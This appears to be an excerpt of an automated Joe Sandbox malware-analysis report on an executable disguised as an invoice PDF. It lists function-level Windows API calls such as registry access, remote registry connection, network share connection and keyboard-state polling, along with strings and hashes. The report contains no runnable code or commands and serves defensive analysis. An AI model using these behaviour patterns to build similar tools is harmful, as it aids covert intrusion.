                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                              • API String ID: 3125838495-3381328864
                                                                              • Opcode ID: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                              • Instruction ID: 9ea7b4bfd8e333fc3d4c3d1cc69785ca983c3453aa66f955cff8de8c622a02b1
                                                                              • Opcode Fuzzy Hash: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                              • Instruction Fuzzy Hash: F011E9B1B40301BBFF10B6659C46EAF739CDF94759F00081BFD44E6182F6ACA9458769
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CopyVariant$ErrorLast
                                                                              • String ID: Conversion of parameters failed$NULL Pointer assignment$Not an Object type
                                                                              • API String ID: 2286883814-4206948668
                                                                              • Opcode ID: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                              • Instruction ID: 5c76bcf0434180a49ef26f8382d3619d889c8a8ee3f63882ad125ac36acecb62
                                                                              • Opcode Fuzzy Hash: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                              • Instruction Fuzzy Hash: 4EA1F0B1644300ABD620EB25CC81EABB3E9FBC4704F10891EF65987251D779E945CBAA
                                                                              APIs
                                                                                • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                                                                • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                              • GetDriveTypeW.KERNEL32(?,?,00000061), ref: 00475EEC
                                                                              • _wcscpy.LIBCMT ref: 00475F18
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                              • String ID: a$all$cdrom$fixed$network$ramdisk$removable$unknown$HH
                                                                              • API String ID: 3052893215-4176887700
                                                                              • Opcode ID: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                              • Instruction ID: 30c0e749cffa51fc832ec364bb88d57898ea161693411a08ebb212f54f1b1ce2
                                                                              • Opcode Fuzzy Hash: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                              • Instruction Fuzzy Hash: E951E5716047009BC710EF51D981B9BB3D4AB85705F108C2FF948AB382D7B9DE09879B
                                                                              APIs
                                                                              • StringFromIID.OLE32(?,?,00000003,?,?,00000000), ref: 004582E5
                                                                                • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              • CoTaskMemFree.OLE32(?,00000000), ref: 00458335
                                                                              • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 00458351
                                                                              • RegQueryValueExW.ADVAPI32 ref: 00458381
                                                                              • CLSIDFromString.OLE32(00000000,?), ref: 004583AF
                                                                              • RegQueryValueExW.ADVAPI32 ref: 004583E8
                                                                              • LoadRegTypeLib.OLEAUT32(?,?), ref: 00458486
                                                                                • Part of subcall function 00413F97: __wtof_l.LIBCMT ref: 00413FA1
                                                                              • RegCloseKey.ADVAPI32(?), ref: 004584BA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: FromQueryStringValue_wcslen$CloseFreeLoadOpenTaskType__wtof_l_wcscpy
                                                                              • String ID: Version$\TypeLib$interface\
                                                                              • API String ID: 656856066-939221531
                                                                              • Opcode ID: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                              • Instruction ID: 73379605cfaaf105ee685c6daddaf2c4824f5dc828714578f474d0d05c7db838
                                                                              • Opcode Fuzzy Hash: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                              • Instruction Fuzzy Hash: 19513B715083059BD310EF55D944A6FB3E8FFC8B08F004A2DF985A7251EA78DD09CB9A
                                                                              APIs
                                                                              • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E676
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E69A
                                                                              • __swprintf.LIBCMT ref: 0045E6EE
                                                                              • _printf.LIBCMT ref: 0045E7A9
                                                                              • _printf.LIBCMT ref: 0045E7D2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: LoadString_printf$__swprintf_wcslen
                                                                              • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                              • API String ID: 3590180749-2354261254
                                                                              • Opcode ID: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                              • Instruction ID: 835382aeb01427732dc6b750cf2ba574ed77461063debdd42288bdc21f9728b4
                                                                              • Opcode Fuzzy Hash: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                              • Instruction Fuzzy Hash: B051D5715143019BD324FB51CC41EAF77A8AF84354F14093FF94563292DB78AE49CB6A
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                              • String ID: %.15g$0x%p$False$True
                                                                              • API String ID: 3038501623-2263619337
                                                                              • Opcode ID: ab5a81ad92dcb896a2cc0bfeaae3a329f7f66724acbb2efb2cb9fd07ffeff384
                                                                              • Instruction ID: 2d826072eebb3cc9b8b6a8fde8b9da0ebc7f558755c715a4a51c402ed3db85ba
                                                                              • Opcode Fuzzy Hash: ab5a81ad92dcb896a2cc0bfeaae3a329f7f66724acbb2efb2cb9fd07ffeff384
                                                                              • Instruction Fuzzy Hash: 5741E5B2504204ABD700EF35EC06EAB73A4EB95304F04892FFD0997282F67DD619976E
                                                                              APIs
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              • _memset.LIBCMT ref: 00458194
                                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004581D6
                                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,00000000), ref: 004581F4
                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,00000000), ref: 00458219
                                                                              • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,?), ref: 00458248
                                                                              • CLSIDFromString.OLE32(00000000,?), ref: 00458279
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0045828F
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00458296
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset_wcslen
                                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                              • API String ID: 2255324689-22481851
                                                                              • Opcode ID: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                              • Instruction ID: 0916ae95de1959dc40878de41837780f7e862baf069d4d5c3429810960799c2e
                                                                              • Opcode Fuzzy Hash: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                              • Instruction Fuzzy Hash: 4A4190725083019BD320EF54C845B5FB7E8AF84714F044D2EFA8577291DBB8E949CB9A
                                                                              APIs
                                                                              • RegOpenKeyExW.ADVAPI32(80000000,interface,00000000,00020019,?), ref: 00458513
                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00458538
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00458615
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,000001FE,interface\), ref: 0045858A
                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000028), ref: 004585A8
                                                                              • __wcsicoll.LIBCMT ref: 004585D6
                                                                              • IIDFromString.OLE32(?,?,?,?), ref: 004585EB
                                                                              • RegCloseKey.ADVAPI32(?), ref: 004585F8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpen$EnumFromQueryStringValue__wcsicoll_wcslen
                                                                              • String ID: ($interface$interface\
                                                                              • API String ID: 2231185022-3327702407
                                                                              • Opcode ID: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                              • Instruction ID: 2ed788c9a442d2de66cb2a0eaf665167c450c6ff9570aaff4df7cfaf3afbbce1
                                                                              • Opcode Fuzzy Hash: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                              • Instruction Fuzzy Hash: CE317271204305ABE710DF54DD85F6BB3E8FB84744F10492DF685A6191EAB8E908C76A
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscpy$Cleanup$Startup_strcatgethostbynamegethostnameinet_ntoa
                                                                              • String ID: 0.0.0.0
                                                                              • API String ID: 2691793716-3771769585
                                                                              • Opcode ID: 72edaa20f59d4c855ae2a4057bf2e912041bb0bcae33cfe0ba1e7234a9852c49
                                                                              • Instruction ID: 29d249c793a1599df1911ffab6ed89036a29d54f41df1114d8fa63e2d2305339
                                                                              • Opcode Fuzzy Hash: 72edaa20f59d4c855ae2a4057bf2e912041bb0bcae33cfe0ba1e7234a9852c49
                                                                              • Instruction Fuzzy Hash: 5C21D4726003016BD620FB269C42FFF33A89FD4318F54492FF64456242EABDD58983AB
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048C968,0000000C,00416C4D,00000000,00000000,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416B24
                                                                              • __crt_waiting_on_module_handle.LIBCMT ref: 00416B2F
                                                                                • Part of subcall function 0041177F: Sleep.KERNEL32(000003E8,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 0041178B
                                                                                • Part of subcall function 0041177F: GetModuleHandleW.KERNEL32(00411739,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00411794
                                                                              • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00416B58
                                                                              • GetProcAddress.KERNEL32(00411739,DecodePointer), ref: 00416B68
                                                                              • __lock.LIBCMT ref: 00416B8A
                                                                              • InterlockedIncrement.KERNEL32(00EA60FF), ref: 00416B97
                                                                              • __lock.LIBCMT ref: 00416BAB
                                                                              • ___addlocaleref.LIBCMT ref: 00416BC9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                              • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                              • API String ID: 1028249917-2843748187
                                                                              • Opcode ID: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                                                              • Instruction ID: dfb830706c011728ae11a8c0f52cb2fa371409e71f4acd403326aacb15a29bdd
                                                                              • Opcode Fuzzy Hash: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                                                              • Instruction Fuzzy Hash: 4E119671944701AFD720EF76C905B9EBBE0AF00714F10495FE469A6391DB78A580CB1D
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000000,000000FF,?), ref: 0044931D
                                                                              • SendMessageW.USER32(?,0045BBB0,00000000,00000000), ref: 0044932D
                                                                              • CharNextW.USER32(?,?,?,?,0045BBB0,00000000,00000000,?,?), ref: 00449361
                                                                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449375
                                                                              • SendMessageW.USER32(?,00000402,?), ref: 0044941C
                                                                              • SendMessageW.USER32(004A83D8,000000C2,00000001,?), ref: 004494A0
                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449515
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CharNext
                                                                              • String ID:
                                                                              • API String ID: 1350042424-0
                                                                              • Opcode ID: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                              • Instruction ID: cf19a455924c4199ae2d31ef2e344bdd2865620a2145bd440d1f5c61272ee54d
                                                                              • Opcode Fuzzy Hash: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                              • Instruction Fuzzy Hash: 5D81B5312083019BE720DF15DC85FBBB7E4EBD9B20F00492EFA54962C0D7B99946D766
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?,?,00000000), ref: 00453C0D
                                                                              • SetKeyboardState.USER32(?), ref: 00453C5A
                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00453C82
                                                                              • GetKeyState.USER32(000000A0), ref: 00453C99
                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00453CC9
                                                                              • GetKeyState.USER32(000000A1), ref: 00453CDA
                                                                              • GetAsyncKeyState.USER32(00000011), ref: 00453D07
                                                                              • GetKeyState.USER32(00000011), ref: 00453D15
                                                                              • GetAsyncKeyState.USER32(00000012), ref: 00453D3F
                                                                              • GetKeyState.USER32(00000012), ref: 00453D4D
                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00453D77
                                                                              • GetKeyState.USER32(0000005B), ref: 00453D85
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: State$Async$Keyboard
                                                                              • String ID:
                                                                              • API String ID: 541375521-0
                                                                              • Opcode ID: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                              • Instruction ID: 09d2c23b2f41f951af40c960ff4fa7a39ed3d74d48f5bb091813d5d41b5bf946
                                                                              • Opcode Fuzzy Hash: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                              • Instruction Fuzzy Hash: BD5108311497C42AF731EF6048217A7BBE45F52782F488D5EE9C107283E619AB0C976B
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,00000001), ref: 00437DD7
                                                                              • GetWindowRect.USER32(00000000,?), ref: 00437DE9
                                                                              • MoveWindow.USER32(00000000,0000000A,?,?,?,00000000), ref: 00437E5C
                                                                              • GetDlgItem.USER32(?,00000002), ref: 00437E70
                                                                              • GetWindowRect.USER32(00000000,?), ref: 00437E82
                                                                              • MoveWindow.USER32(00000000,?,00000000,?,?,00000000), ref: 00437EDB
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00437EEA
                                                                              • GetWindowRect.USER32(00000000,?), ref: 00437EFC
                                                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00437F46
                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00437F55
                                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 00437F6E
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00437F78
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                                              • String ID:
                                                                              • API String ID: 3096461208-0
                                                                              • Opcode ID: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                                                                              • Instruction ID: 6334a21bf5495bf578199e0a0c43900503e40640961724061e29feeedb49a886
                                                                              • Opcode Fuzzy Hash: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                                                                              • Instruction Fuzzy Hash: 46511CB16083069FC318DF68DD85A2BB7E9ABC8300F144A2DF985D3391E6B4ED058B95
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                              • String ID:
                                                                              • API String ID: 136442275-0
                                                                              • Opcode ID: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                                                                              • Instruction ID: e47e2093bf76b35e8f1fec89578fc46911e8a4506192668d3a16ce6d5165f020
                                                                              • Opcode Fuzzy Hash: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                                                                              • Instruction Fuzzy Hash: 744124B2408345ABC235E754C885EEF73ECABD8314F44891EB68D42141EB796688C7A7
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B479
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ConnectRegistry_wcslen
                                                                              • String ID: HH
                                                                              • API String ID: 535477410-2761332787
